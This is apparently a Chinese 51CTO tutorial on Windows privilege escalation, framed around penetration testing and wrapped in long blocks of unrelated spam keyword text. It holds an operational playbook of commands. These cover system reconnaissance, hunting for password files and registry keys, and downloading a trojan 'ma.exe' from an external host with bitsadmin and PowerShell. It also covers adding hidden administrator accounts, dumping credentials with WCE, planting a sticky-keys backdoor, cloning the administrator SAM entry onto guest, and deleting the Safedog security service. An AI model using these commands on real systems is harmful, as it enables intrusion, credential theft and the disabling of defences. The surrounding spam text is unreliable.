精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

Windows提權基礎:信息收集技巧及可用漏洞搜索

原創
安全 網站安全 應用安全
本文收集整理一些跟提權緊密相關的信息收集技巧和方法,以及如何在kali中搜索可用的漏洞,最后整理了目前可供使用的一些漏洞對應msf下的模塊以及操作系統可提權的版本。

【51CTO.com原創稿件】在滲透過程中很多人都認為Windows提權很難,其核心是掌握的基礎不夠扎實,當然除了極為變態的權限設置的服務器,基本上筆者遇到的服務器99%都提權成功了,本文收集整理一些跟提權緊密相關的信息收集技巧和方法,以及如何在kali中搜索可用的漏洞,最后整理了目前可供使用的一些漏洞對應msf下的模塊以及操作系統可提權的版本。

一、Windows提權信息收集

1. 收集OS名稱和版本信息

  1. systeminfo | findstr /B /C:"OS Name" /C:"OS Version" 
  2. systeminfo | findstr /B /C:"OS 名稱" /C:"OS 版本" 

2. 主機名稱和所有環境變量

  • 主機名稱:hostname
  • 環境變量:SET

3. 查看用戶信息

  • 查看所有用戶:net user 或者net1 user
  • 查看管理員用戶組:net localgroup administrators或者net1 localgroup administrators
  • 查看遠程終端在線用戶:query user 或者quser

4. 查看遠程端口

(1)注冊表查看

  1. REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber 

(2)通過命令行查看

  • 獲取對應的PID號:tasklist /svc | find "TermService"
  • 通過PID號查找端口:netstat -ano | find "1980"

5. 查看網絡情況

(1)網絡配置情況:ipconfig /all

(2)路由器信息: route print

(3)要查看ARP緩存: arp -A

(4)查看網絡連接: netstat -ano

(5)要查看防火墻規則:

  1. netsh firewall show config  
  2. netsh firewall show state 

6. 應用程序和服務

(1)要查看服務的進程ID:tasklist /SVC

(2)已安裝驅動程序的列表:DRIVERQUERY

(3)已經啟動Windows 服務net start

(4)查看某服務啟動權限:sc qc TermService

(5)已安裝程序的列表:wmic product list brief

(6)查看服務列表:wmic service list brief # Lists services

(7)查看進程列表wmic process list brief # Lists processes

(8)查看啟動程序列表wmic startup list brief # Lists startup items

(9)檢查補丁已安裝的更新和安裝日期

  1. wmic qfe get Caption,De**ion,HotFixID,InstalledOn 

搜索,您可以使用提升權限的特定漏洞:

  1. wmic qfe get Caption,De**ion,HotFixID,InstalledOn | findstr  /C:"KBxxxxxxx" 

執行上面的命令的沒有輸出,意味著那個補丁未安裝。

(10)結束程序:

  1. wmic process where name="iexplore.exe" call terminate 

7. 檢索敏感文件

  1. dir /b/s password.txt 
  2. dir /b /s *.doc 
  3. dir /b /s *.ppt 
  4. dir /b /s *.xls 
  5. dir /b /s *. docx 
  6. dir /b /s *.xlsx 
  7. dir /b/s config.* filesystem 
  8. findstr /si password *.xml *.ini *.txt  
  9. findstr /si login *.xml *.ini *.txt 

除此之外,您還可以檢查無人值守安裝日志文件。這些文件通常包含base64編碼的密碼。你更可能在大型企業中,其中單個系統的手動安裝是不切實際的,找到這些文件即可獲取管理員密碼。這些文件的共同位置是:

  • C:\sysprep.inf
  • C:\sysprep\sysprep.xml
  • C:\Windows\Panther\Unattend\Unattended.xml
  • C:\Windows\Panther\Unattended.xml

8. 目錄文件操作

(1)列出d:\www的所有目錄:

  1. for /d %i in (d:\www\*) do @echo %i 

(2)把當前路徑下文件夾的名字只有1-3個字母的顯示出來:

  1. for /d %i in (???) do @echo %i 

(3)以當前目錄為搜索路徑,把當前目錄與下面的子目錄的全部EXE文件列出:

  1. for /r %i in (*.exe) do @echo %i 

(4)以指定目錄為搜索路徑,把當前目錄與下面的子目錄的所有文件列出

  1. for /r "f:\freehost\hmadesign\web\" %i in (*.*) do @echo %i 

(5)顯示a.txt里面的內容,因為/f的作用,會讀出a.txt中:

  1. for /f %i in (c:\1.txt) do echo %i 

9. RAR打包

  1. rar a -k -r -s -m3 c:\1.rar d:\wwwroot 

10. php讀文件

  1. c:/php/php.exe "c:/www/admin/1.php" 

11. Windows7及以上的版本操作系統文件下載可以使用的bitsadmin和powershell:

  1. bitsadmin /transfer myjob1 /download /priority normal http://www.antian365.com/lab/4433.exe c:\ma.exe 
  2. powershell (new-object System.Net.WebClient).DownloadFile(' http://www.antian365.com/ma.exe','ma.exe') 

12. 注冊表關鍵字搜索,password為關鍵字,可以是vnc等敏感關鍵字

  1. reg query HKLM /f password /t REG_SZ /s 
  2. reg query HKCU /f password /t REG_SZ /s 

13.系統權限配置

  1. cacls c:\ 
  2. cacls c:\windows\ma.exe 查看ma.exe的權限配置 

14.自動收集系統有用信息腳本

  1. for /f "delims=" %%A in ('dir /s /b %WINDIR%\system32\*htable.xsl') do set "var=%%A" 
  2. wmic process get CSName,Description,ExecutablePath,ProcessId /format:"%var%" >> out.html 
  3. wmic service get Caption,Name,PathName,ServiceType,Started,StartMode,StartName /format:"%var%" >> out.html 
  4. wmic USERACCOUNT list full /format:"%var%" >> out.html 
  5. wmic group list full /format:"%var%" >> out.html 
  6. wmic nicconfig where IPEnabled='true' get Caption,DefaultIPGateway,Description,DHCPEnabled,DHCPServer,IPAddress,IPSubnet,MACAddress /format:"%var%" >> out.html 
  7. wmic volume get Label,DeviceID,DriveLetter,FileSystem,Capacity,FreeSpace /format:"%var%" >> out.html 
  8. wmic netuse list full /format:"%var%" >> out.html 
  9. wmic qfe get Caption,Description,HotFixID,InstalledOn /format:"%var%" >> out.html 
  10. wmic startup get Caption,Command,Location,User /format:"%var%" >> out.html 
  11. wmic PRODUCT get Description,InstallDate,InstallLocation,PackageCache,Vendor,Version /format:"%var%" >> out.html 
  12. wmic os get name,version,InstallDate,LastBootUpTime,LocalDateTime,Manufacturer,RegisteredUser,ServicePackMajorVersion,SystemDirectory /format:"%var%" >> out.html 
  13. wmic Timezone get DaylightName,Description,StandardName /format:"%var%" >> out.html 

二、Windows提權準備

通過前面的基礎命令以及本章的第二章節,可以有針對性的對目標開展提權工作,根據Windows-Exploit-Suggester獲取目前系統可能存在的漏洞。

1. 收集并編譯相關POC

2. 若操作系統有殺毒軟件以及安全防護軟件,則需要對提權POC進行免殺,否則進行下一步。

3. 上傳POC

4. 有webshell或者反彈webshell來執行命令

5. 搜索漏洞,根據關鍵字進行搜索例如MS10-061。

(1)在百度瀏覽器中搜索“MS10-061 site:exploit-db.com”

(2)packetstormsecurity網站搜索

https://packetstormsecurity.com/search/?q=MS16-016

(3)安全焦點,其BugTraq是一個出色的漏洞和exploit數據源,可以通過CVE編號,或者產品信息漏洞直接搜索。網址:http://www.securityfocus.com/bid。

三、使用msf平臺搜索可利用POC

1. 搜索poc

在kali中打開msf或者執行“/usr/bin/msfconsole”,在出來的命令提示符下使用命令進行搜索:

  1. search ms08 
  2. search ms09 
  3. search ms10 
  4. search ms11 
  5. search ms12 
  6. search ms13 
  7. search ms14 
  8. search ms15 
  9. search ms16 
  10. search ms17 

以上命令將搜索2008年至2017年的所有可用的Windows下的exploit,例如搜索2015年的exploit,如圖1所示。

搜索2015年所有可用的0day

圖1搜索2015年所有可用的0day

2. 查看相關漏洞情況

可以通過微軟官方網站查看漏洞對應的版本,利用方式為https://technet.microsoft.com/library/security/漏洞號,例如查看ms08-068則其網頁打開方式為:https://technet.microsoft.com/library/security/ms08-068,如圖2所示,如果顯示為嚴重則表明可以被利用。

微軟官方對應版本號

圖2微軟官方對應版本號

四、實施提權

執行命令。比如可利用poc文件為poc.exe,則可以使用如下的一些命令提權:

(1)直接執行木馬。

  1. poc.exe ma.exe 

(2)添加用戶

  1. poc.exe "net user antian365 1qaz2wsx /add" 
  2. poc.exe "net localgroup administrators antian365 /add" 

(3)獲取明文密碼或者哈希值

  1. poc.exe "wce32.exe -w"  
  2. poc.exe "wce64.exe -w" 
  3. poc.exe "wce32" 

五、相關資源下載

1. Tools下載

wce下載:

  • http://www.ampliasecurity.com/research/windows-credentials-editor/
  • http://www.ampliasecurity.com/research/wce_v1_42beta_x32.zip
  • http://www.ampliasecurity.com/research/wce_v1_42beta_x64.zip
  • sysinternals :https://technet.microsoft.com/en-us/sysinternals/bb842062
  • mimikatz :http://blog.gentilkiwi.com/mimikatz
  • python :https://www.python.org/downloads/windows/

2. 搜索漏洞和shellcode

  • http://www.exploit-db.com
  • http://1337day.com
  • http://0day.today
  • http://www.securityfocus.com
  • http://seclists.org/fulldisclosure/
  • http://www.exploitsearch.net
  • http://www.securiteam.com
  • http://metasploit.com/modules/
  • http://securityreason.com
  • https://cxsecurity.com/exploit/
  • http://securitytracker.com/

六、Windows本地溢出漏洞對應表

Windows2003對應漏洞、編號及其影響系統及msf模塊

1. 2007年對應漏洞、編號及其影響系統及msf模塊

  1. (1)KB935966 |MS07-029  Win2000SP4、Win2003SP1/SP2 exploit/windows/dcerpc/ms07_029_msdns_zonename 
  2. exploit/windows/smb/ms07_029_msdns_zonename 
  3. (2)KB937894| MS07-065 WinxpSP2、Win2000SP4、WinXP-x64-SP2、Win2003SP1/SP2 
  4. exploit/windows/dcerpc/ms07_065_msmq 
  5. (3)KB941568|MS07-064 Win2000SP4  
  6.   exploit/windows/misc/ms07_064_sami 
  7. (4)KB944653|MS07-067 WinXPSP2、WinXP-x64-SP2、Win2003SP1/SP2 

2. 2008年對應漏洞、編號及其影響系統及msf模塊

  1. (1)KB958644 |MS08-067 Win2000SP4、WinXP-SP2/SP3、 
  2. WinXP-64-SP/SP2、Win2003SP1/SP2、Win2003-64/SP2 
  3. exploit/windows/smb/ms08_067_netapi 
  4. (2)KB 957097| MS08-068 Win2000SP4、WinXP-SP2/SP3、 
  5. WinXP-64-SP/SP2、Win2003SP1/SP2、Win2003-64/SP2 
  6. exploit/windows/smb/smb_relay  

3. 2009年對應漏洞、編號及其影響系統及msf模塊

  1. (1)KB952004|MS09-012 PR Win2003/2008 
  2. (2)KB956572|MS09-012烤肉 
  3. (3)KB970483|MS09-020 IIS6 
  4. (4)KB971657|MS09-041 WinXP、Win2003提權 
  5. (5)KB975254|MS09-053 IIS5遠程溢出,Windows2000SP4,Win2003及Win2008拒絕服務。 
  6. (6)KB975517 |MS09-050 Vista、Win2008-32/SP2、Win2008-64/SP2 
  7. exploit/windows/smb/ms09_050_smb2_negotiate_func_index 

4. 2010年對應漏洞、編號及其影響系統及msf模塊

  1. (1)KB977165|MS10-015 Vista、Win2003-32-64/SP2、Win2008-32-64/SP2 
  2. exploit/windows/local/ms10_015_kitrap0d 
  3. (2)KB 2347290|MS10-061 Winxp3、Winxp64sp2、Win2003-32-64 SP2、Win2008-32-64 SP2 
  4. (3)KB2360937|MS10-084 Winxp3、Winxp64sp2、Win2003-32-64 SP2 
  5. (4)KB2305420| MS10-092 Win7-32-64、Win2008-32-64、Win2008R2-32-64 
  6. exploit/windows/local/ms10_092_schelevator 
  7. (5)KB2124261|KB2271195  MS10-065 IIS7 

5. 2011年對應漏洞、編號及其影響系統及msf模塊

  1. (1)KB2393802|MS11-011 
  2. Winxp32-64-SP3、Win2003-32-64-SP2、Win7-32-64-SP1、 Win2008-R2-64-SP2 
  3. (2)KB2478960|MS11-014 
  4. Winxp32-64-SP3、Win2003-32-64-SP2 
  5. (3)KB2507938|MS11-056 
  6. Winxp32-64-SP3、Win2003-32-64-SP2、Win7-32-64-SP1、 Win2008-R2-64-SP2 
  7. (4)KB2566454|MS11-062 
  8. Winxp32-64-SP3、Win2003-32-64-SP2 
  9. (5)KB2620712|MS11-097 
  10. Winxp-SP3、Win2003-SP2、Win7-64-SP1、 Win2008R2-64-SP1 
  11. (6)KB2503665|MS11-046 
  12. Winxp-SP3、Win2003-SP2、Win7-64-SP1、 Win2008R2-64-SP1 
  13. (7)KB2592799|MS11-080 
  14. Winxp-SP3、Win2003-SP2 
  15. exploit/windows/local/ms11_080_afdjoinleaf 

6. 2012年對應漏洞、編號及其影響系統及msf模塊

  1. (1)KB2711167| KB2707511|KB2709715|MS12-042  sysret –pid 
  2. Winxp-SP3、Win2003-SP2、Win7-64-SP1、 Win2008R2-64-SP1、Win8-32-64、Win2012 
  3. (2)KB2621440|MS12-020 Winxp-SP3、Win2003-SP2、Win7-64-SP1、 Win2008R2-64-SP1、 

7. 2013年對應漏洞、編號及其影響系統及msf模塊

  1. (1)KB2778930|MS13-005 Vista-32-64-SP2、Win2008-32-64-SP2、Win7-32-64-SP1、 Win2008R2-64-SP1、Win8-32-64、Win2012 
  2. exploit/windows/local/ms13_005_hwnd_broadcast 
  3. (2)KB2840221|MS13-046 WinXP-32-SP3、WinXP-64-SP2、Win2003-32-64-SP2、Vista-32-64-SP2、Win2008-R2-32-64-SP2、Win7-32-64-SP1、 Win2008R2-64-SP1、Win8-32-64、Win2012、Win2012R2 
  4. (3)KB2850851|MS13-053 EPATHOBJ 0day,WinXP-32-SP3、WinXP-64-SP2、Win2003-32-64-SP2、Vista-32-64-SP2、Win2008-R2-32-64-SP2、Win7-32-64-SP1、 Win2008R2-64-SP1、Win8-32-64、Win2012 
  5. exploit/windows/local/ms13_053_schlamperei 

8. 2014年對應漏洞、編號及其影響系統及msf模塊

  1. (1)KB 2914368 |MS14-002 WinXPSP3、WinXP-64-SP2、Win2003-32-64-sp2 
  2. exploit/windows/local/ms_ndproxy 
  3. (2)KB 2916607|MS14-009 Win2003-32-64-SP2、Vista-32-64-SP2、Win2008-32-64-SP2、Win7-R2-32-64-SP1、 Win2008R2-64-SP1、Win8-8.1-32-64、Win2012、Win2012R2 
  4. exploit/windows/local/ms14_009_ie_dfsvc 
  5. (3)KB3000061|MS14-058 Win2003-32-64-SP2、Vista-32-64-SP2、Win2008-R2-32-64-SP2、Win7-32-64-SP1、 Win2008R2-64-SP1、Win8-8.1-32-64、Win2012、Win2012R2 
  6. exploit/windows/local/ms14_058_track_popup_menu 
  7. (4)KB 2989935|MS14-070 Win2003-32-64-SP2 
  8. exploit/windows/local/ms14_070_tcpip_ioctl 

9. 2015年對應漏洞、編號及其影響系統及msf模塊

  1. (1)KB3023266|MS15-001 Win7-32-64-SP1、Win2008R2-32-64-SP1、 Win2008R2-64-SP1、Win8-8.1-32-64、Win2012、Win2012R2 
  2. exploit/windows/local/ntapphelpcachecontrol 
  3. (2)KB3025421|MS15_004、Win7-32-64-SP1、Win2008R2-32-64-SP1、 Win2008R2-64-SP1、Win8-8.1-32-64、Win2012、Win2012R2 
  4. exploit/windows/local/ms15_004_tswbproxy 
  5. (3)KB3041836|MS15-020、Win2003-32-64-SP2、Vista-32-64-SP2、Win2008-32-64-SP2、Win7-R2-32-64-SP1、 Win2008R2-64-SP1、Win8-8.1-32-64、Win2012、Win2012R2 
  6. exploit/windows/smb/ms15_020_shortcut_icon_dllloader 
  7. (4)KB3057191|MS15-051 
  8. Win2003-32-64-SP2、Vista-32-64-SP2、Win2008-32-64-SP2、Win7-R2-32-64-SP1、 Win2008R2-64-SP1、Win8-8.1-32-64、Win2012、Win2012R2 
  9. exploit/windows/local/ms15_051_client_copy_image 
  10. (5)KB3077657|MS15-077 
  11. Win2003-32-64-SP2、Vista-32-64-SP2、Win2008-32-64-SP2、Win7-R2-32-64-SP1、 Win2008R2-64-SP1、Win8-8.1-32-64、Win2012、Win2012R2 
  12. (6)KB 3079904|MS15_078 
  13. Win2003-32-64-SP2、Vista-32-64-SP2、Win2008-32-64-SP2、Win7-R2-32-64-SP1、 Win2008R2-64-SP1、Win8-8.1-32-64、Win2012、Win2012R2 
  14. exploit/windows/local/ms15_078_atmfd_bof 
  15. (7)KB3079904|MS15-097 
  16. Win2003-32-64-SP2、Vista-32-64-SP2、Win2008-32-64-SP2、Win7-R2-32-64-SP1、 Win2008R2-64-SP1、Win8-8.1-32-64、Win2012、Win2012R2 
  17. exploit/windows/smb/ms15_020_shortcut_icon_dllloader 

10. 2016年對應漏洞、編號及其影響系統及msf模塊

  1. (1)KB3134228|MS16-014 Win2008、Win7、Win2012 
  2. (2)KB3124280|MS16-016 WebDAV提權漏洞,Vista-32-64-SP2、Win2008-32-64-SP2、Win7-32-64-SP1、Win2008R2-64-SP1、Win8.1-32-64、Win2012、Win2012R2、Win10-32-64 
  3. exploit/windows/local/ms16_016_webdav 
  4. (3)KB3139914|MS16-032、Vista-32-64-SP2、Win2008-32-64-SP2、Win7-32-64-SP1、Win2008R2-64-SP1、Win8.1-32-64、Win2012、Win2012R2、Win10-32-64 
  5. exploit/windows/local/ms16_032_secondary_logon_handle_privesc 
  6. Windows 2003 SP2 安裝了MS10-046補丁,可用ms15_020進行溢出 
  7. Windows 2008 SP2 (32 bits)安裝了MS14-027補丁可用ms15_020進行溢出 

七、過安全狗

1. vbs法

將以下代碼保存為1.vbs然后執行cscript 1.vbs

  1. Set o=CreateObject( "Shell.Users" ) 
  2. Set z=o.create("user") 
  3. z.changePassword "1qaz2WSX12","" 
  4. z.setting("AccountType")=3 

2. shift后門法

  1. copy C:\sethc.exe C:\windows\system32\sethc.exe  
  2. copy C:\windows\system32\sethc.exe C:\windows\system32\dllcache\sethc.exe 

3. for循環添加帳號法

  1. for /l %%i in (1,1,100) do @net user temp asphxg /add&@net localgroup administrators temp /add 

4. 修改注冊表法

administrator對應值是1F4,GUEST是1F5。

(1)使用net1 user guset 1 ,將guest密碼重置為1,無需過問是guest否禁用

(2)執行:reg export "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4" "C:\RECYCLER\1.reg"

導出administrator的注冊表值到某路徑,修改內容,將"V"值刪除,只留F值,將1F4修改為1F5,保存。

(3)執行regedit /s C:\RECYCLER\1.reg 導入注冊表

就可以使用,guest 密碼1登陸了。

5. 直接修改管理員密碼法,盡量不用這招,實在沒有辦法就用這個。

  1. net user administrator somepwd 

6. 刪除與停止安全狗相關服務法

如果是system權限可以采取以下方法停止安全狗

(1)停止安全狗相關服務

  1. net stop    "Safedog Guard Center"  /y 
  2. net stop    "Safedog Update Center" /y 
  3. net stop    "SafeDogCloudHelper"  /y 

(2)直接刪除SafeDogGuardCenter服務

  1. sc stop "SafeDogGuardCenter"  
  2. sc config "SafeDogGuardCenter" startdisabled  
  3. sc delete "SafeDogGuardCenter" 
  4.  
  5. sc stop " SafeDogUpdateCenter"  
  6. sc config " SafeDogUpdateCenter" startdisabled  
  7. sc delete " SafeDogUpdateCenter" 
  8.  
  9. sc stop " SafeDogCloudHelper"  
  10. sc config " SafeDogCloudHelper" startdisabled  
  11. sc delete " SafeDogCloudHelper" 

【51CTO原創稿件,合作站點轉載請注明原文作者和出處為51CTO.com】

責任編輯:趙寧寧 來源: 51CTO.com
相關推薦

2016-05-17 09:42:16

2020-11-16 10:55:41

Windows

2013-11-29 15:34:00

2021-05-01 20:52:30

漏洞網絡安全網絡攻擊

2023-06-11 17:24:26

2015-03-13 10:06:55

2023-09-11 06:59:59

2022-03-10 09:41:15

漏洞Linux內核

2020-10-06 13:58:25

漏洞

2010-12-10 15:23:49

Linux漏洞

2025-04-18 10:17:47

2021-01-13 08:14:36

Windows提權漏洞攻擊

2025-05-14 18:12:33

零日漏洞漏洞網絡攻擊

2009-07-25 17:24:45

2023-10-09 18:22:35

2017-04-17 19:48:51

2016-12-12 09:11:20

2014-01-03 17:33:42

網絡·安全技術周刊

2025-11-13 09:39:01

2009-04-24 14:08:25

點贊
收藏

51CTO技術棧公眾號

狠狠色综合网站久久久久久久| 亚洲第一精品夜夜躁人人躁| 国产卡一卡二在线| 高h调教冰块play男男双性文| 伊人久久久大香线蕉综合直播| 亚洲国产成人久久综合| 91极品视频在线观看| 四虎影院观看视频在线观看 | 黄色片一区二区| 日韩成人精品在线| 欧美俄罗斯性视频| 中文字幕免费视频| 懂色av一区二区| 欧美亚洲国产一区二区三区 | 国产精品18在线| 日韩欧美黄色| 日韩欧美国产午夜精品| 国产成人手机视频| 美女91在线看| 亚洲精品乱码久久久久久| 欧美精品在线一区| 空姐吹箫视频大全| 国产麻豆精品在线| 91精品久久久久久久久中文字幕 | 噜噜噜躁狠狠躁狠狠精品视频 | 久久久久久久久久久网| 成人中文视频| 亚洲欧美999| 亚洲欧美日韩色| 久久久91麻豆精品国产一区| 欧洲国产伦久久久久久久| 久久视频这里有精品| 宅男在线观看免费高清网站| 国产精品久久久久久久午夜片 | 国产午夜在线观看| 99国产精品久久久久久久久久久| 5g国产欧美日韩视频| 一级欧美一级日韩| 青椒成人免费视频| 国产精品都在这里| 波多野结衣视频网址| 免费日韩精品中文字幕视频在线| 久久久这里只有精品视频| 亚洲av无码一区二区三区在线| 成人一区而且| 亚洲欧美一区二区三区久久| 丰满少妇一区二区三区| 美女视频亚洲色图| 亚洲精品成人免费| 波多野结衣影院| 欧亚精品一区| 亚洲精品综合久久中文字幕| 无码人妻aⅴ一区二区三区| 国产精品视屏| 日韩成人在线观看| 成人乱码一区二区三区av| 亚洲宅男一区| 中文字幕亚洲无线码a| 丁香激情五月少妇| 香蕉久久网站| 久久久久这里只有精品| 久久狠狠高潮亚洲精品| 国产视频一区三区| 国产精品私拍pans大尺度在线| 中文字幕av免费观看| 久久爱www久久做| 91免费看国产| 乱色精品无码一区二区国产盗| 成人av在线播放网站| 久久精品国产99精品国产亚洲性色| 亚洲av成人无码久久精品老人 | 日韩欧美精品在线不卡| 69久久精品| 亚洲精品水蜜桃| 免费观看美女裸体网站| 色狠狠久久av五月综合| 成人免费午夜电影| 中文字幕xxxx| 蜜芽一区二区三区| 国产综合色香蕉精品| av中文字幕播放| www.亚洲色图.com| 日韩欧美在线电影| 操你啦在线视频| 亚洲va欧美va人人爽| 亚洲中文字幕无码不卡电影| 电影亚洲一区| 日韩精品一区二区三区中文不卡 | 亚洲欧美成人网| 91免费在线看片| 亚洲图片在线| 国产精品国产自产拍高清av水多 | 国产中文字字幕乱码无限| 免费视频一区二区三区在线观看| 国产精品女主播视频| www.狠狠干| 久久久久久久综合日本| 警花观音坐莲激情销魂小说| 高清在线视频不卡| 欧美高清性hdvideosex| 国产精品无码在线| 亚洲精品网址| 国产精品999999| www.亚洲天堂.com| 国产欧美日韩不卡免费| 国产爆乳无码一区二区麻豆| 久久xxx视频| 亚洲精品久久久久中文字幕欢迎你 | 欧美色资源站| 久久综合久中文字幕青草| 天天操天天摸天天干| 国内精品第一页| 日韩精品欧美专区| 擼擼色在线看观看免费| 制服丝袜国产精品| 亚洲ⅴ国产v天堂a无码二区| 亚洲国产日本| 91久久极品少妇xxxxⅹ软件| 搞黄视频免费在线观看| 精品久久久久久久久久| 亚洲AV无码久久精品国产一区| 国产一区二区三区天码| 性欧美暴力猛交69hd| av资源免费看| 亚洲色图视频免费播放| 欧美婷婷精品激情| 久久av免费| 45www国产精品网站| 国产av无码专区亚洲a∨毛片| 国产精品伦一区二区三级视频| 黄色片视频在线免费观看| 白嫩白嫩国产精品| 欧美另类在线观看| 999av视频| 成人欧美一区二区三区白人| 免费看污污网站| 久久99国内| 国产成人福利网站| 欧美黄色小说| 色天使色偷偷av一区二区| 久久免费美女视频| 神马影院午夜我不卡影院| 久热在线观看视频| 亚洲精品一线二线三线| 九九视频免费在线观看| 国产在线精品一区二区夜色| 中文字幕一区二区三区乱码 | 亚洲va久久久噜噜噜| 免费a级在线播放| 91.麻豆视频| 九九视频免费看| 成人av手机在线观看| 日本丰满少妇xxxx| 亚洲人成网www| 国产成人精品最新| 永久免费在线观看视频| 欧美久久久久中文字幕| 丁香花五月激情| 波多野结衣在线aⅴ中文字幕不卡 波多野结衣在线一区 | 欧美日韩久久婷婷| 好看不卡的中文字幕| 国产有色视频色综合| 亚洲欧洲高清| 色妞一区二区三区| 成人av无码一区二区三区| 亚洲高清免费观看| 国产精品815.cc红桃| 捆绑紧缚一区二区三区视频| 欧美日韩一区二区三区电影| 91亚洲无吗| 久久免费精品视频| 成人资源www网在线最新版| 欧美日韩三级视频| 久久精品99国产精| 久久品道一品道久久精品| 国产又黄又猛又粗| 亚洲九九视频| 精品乱码一区| 日本.亚洲电影| 欧美成人小视频| 国产一级片在线| 日韩一区二区电影网| 色婷婷av国产精品| 国产精品国产三级国产aⅴ无密码| 免费观看污网站| 日韩高清一区在线| 亚洲欧美久久234| 久久91在线| 国产精品小说在线| www.超碰在线| 精品国产区一区二区三区在线观看 | av在线最新| 日韩在线播放一区| 三级视频在线| 日韩情涩欧美日韩视频| 区一区二在线观看| 亚洲香蕉伊在人在线观| 五月婷婷六月香| caoporm超碰国产精品| 亚洲欧美日韩三级| 麻豆久久精品| 欧美亚洲日本一区二区三区| 欧美激情黄色片| 久久久久se| 日本一区二区三区电影免费观看 | 奇米精品一区二区三区| 久久久久国产| 日韩在线电影一区| 首页亚洲中字| 高清日韩一区| 久久久久九九精品影院| 国产精品自拍小视频| 午夜伦理福利在线| 欧美极度另类性三渗透| 免费人成在线观看播放视频| 亚洲石原莉奈一区二区在线观看| 国产91麻豆视频| 欧美一区二区国产| 6—12呦国产精品| 欧美午夜在线一二页| 九九九在线观看| 亚洲国产成人av| 欧美成欧美va| 依依成人精品视频| avtt天堂在线| 亚洲精品视频在线看| 99成人在线观看| 中文久久乱码一区二区| 自拍偷拍视频亚洲| 久久久久亚洲蜜桃| xxx在线播放| 久久亚洲私人国产精品va媚药| 91精品又粗又猛又爽| 国产成人综合网| 中文字幕人妻无码系列第三区| 久久国产欧美日韩精品| 久久国产这里只有精品| 美女www一区二区| 亚洲国产成人va在线观看麻豆| 日韩精品欧美成人高清一区二区| 国产又大又硬又粗| 日韩国产欧美视频| 日韩av片专区| 国产一区二区在线视频| 国产探花在线观看视频| 国产精品资源网| wwwww在线观看| 成人免费毛片a| 国产在线观看无码免费视频| 久久久久久久久久久久久夜| 非洲一级黄色片| 国产精品久久免费看| 国产精品99久久久久久成人| 亚洲精品午夜久久久| 久久久精品人妻一区二区三区四| 亚洲无人区一区| 日韩精品手机在线| 日本黄色一区二区| 一级黄色片在线| 日韩免费电影网站| 天堂在线免费av| 亚洲一级免费视频| 日本在线视频观看| 欧美老少做受xxxx高潮| 91jq激情在线观看| 国产成人精品999| 91精品福利观看| 国产精品三区www17con| 深爱激情综合网| 一区二区三区|亚洲午夜| 中国成人一区| 国产成人无码a区在线观看视频| 久久综合导航| www.51色.com| 久久影院视频免费| 在线看的片片片免费| 五月婷婷色综合| 亚洲天堂中文在线| 欧美精品一区二区三区蜜臀| 黄色网址在线播放| 色与欲影视天天看综合网| 欧美少妇精品| 成人在线视频网站| 秋霞影院一区二区三区| 中文字幕一区二区三区在线乱码| 影音先锋久久| 在线观看国产一级片| 丁香六月综合激情| 日韩精品电影一区二区三区| 亚洲一区二区三区视频在线播放| 少妇无套内谢久久久久| 日韩欧美国产午夜精品| 粉嫩av在线播放| 久久久久久久影院| 97精品国产99久久久久久免费| 国产精品成人一区二区三区| re久久精品视频| 免费av观看网址| 国产一区视频在线看| 三级网站在线免费观看| 一区二区三区视频在线观看| 中文字幕日本视频| 亚洲精品国产精品乱码不99按摩 | 欧美一级电影免费在线观看| gogo大尺度成人免费视频| 日本一区二区三区在线视频| 伊人狠狠色j香婷婷综合| 国产乱女淫av麻豆国产| 久久久久久麻豆| 日韩污视频在线观看| 日韩一区二区在线观看| eeuss影院在线播放| 欧美亚洲国产精品| 精品精品国产毛片在线看| 中文字幕精品在线播放| 久久国产三级精品| 亚洲精品视频网址| 91成人免费在线| 日韩av视屏| 98视频在线噜噜噜国产| 中文字幕日韩高清在线| 男人j进女人j| 韩国欧美国产1区| 黄色一级片一级片| 日本高清不卡在线观看| 天堂av在线免费观看| 久久人人97超碰精品888| 少妇精品在线| 日韩国产小视频| 国产馆精品极品| 亚洲成人生活片| 欧美大胆人体bbbb| 亚洲www色| 国产精品美女久久久久av福利| 中文字幕一区二区三区在线视频| 999久久久精品视频| 国产精品麻豆网站| 国产精品久久777777换脸| 日韩在线欧美在线| 亚洲天堂网站| 日本黄xxxxxxxxx100| 国产一区二区不卡| 久久久久97国产| 亚洲国产精品悠悠久久琪琪 | 欧美性生交xxxxxdddd| 日本一卡二卡四卡精品| 日本精品一区二区三区在线播放视频 | 在线播放国产一区二区三区| 草莓视频成人appios| 亚洲欧洲精品一区| 极品少妇一区二区三区精品视频| 日本一级特级毛片视频| 欧美一级理论片| 麻豆蜜桃在线| 欧美一级爱爱| 美女www一区二区| 九九视频免费在线观看| 日韩激情视频在线| 在线看欧美视频| 波多野结衣三级在线| 国产高清视频一区| 日韩欧美中文字幕一区二区| 亚洲美女在线视频| 国产一区二区色噜噜| 狠狠干视频网站| 91首页免费视频| 亚洲视频久久久| 欧美激情一区二区三区成人 | 伊人久久大香伊蕉在人线观看热v 伊人久久大香线蕉综合影院首页 伊人久久大香 | 久久久999精品视频| 99久久婷婷国产综合精品青牛牛| 日韩在线一级片| 国产精品久久久99| 亚洲精品网站在线| 国产精品mp4| 中文乱码免费一区二区三区下载| 朝桐光av一区二区三区| 欧美在线观看一二区| 五月天激情在线| 欧美日韩精品久久| 国产美女久久久久| 青青国产在线观看| 久久久国产一区二区三区| 老汉色老汉首页av亚洲| 蜜臀av免费观看| 亚洲成人免费视| 日韩黄色影院| 国产一区二区无遮挡| 久久精品国产精品亚洲红杏| 精品在线免费观看视频| 中文字幕精品av| 高潮按摩久久久久久av免费| 91视频免费版污| 亚洲二区视频在线| 久久黄色美女电影| 欧美精品一区在线发布| 成人精品在线视频观看| 一区二区三区亚洲视频| 啪一啪鲁一鲁2019在线视频| 午夜精品偷拍|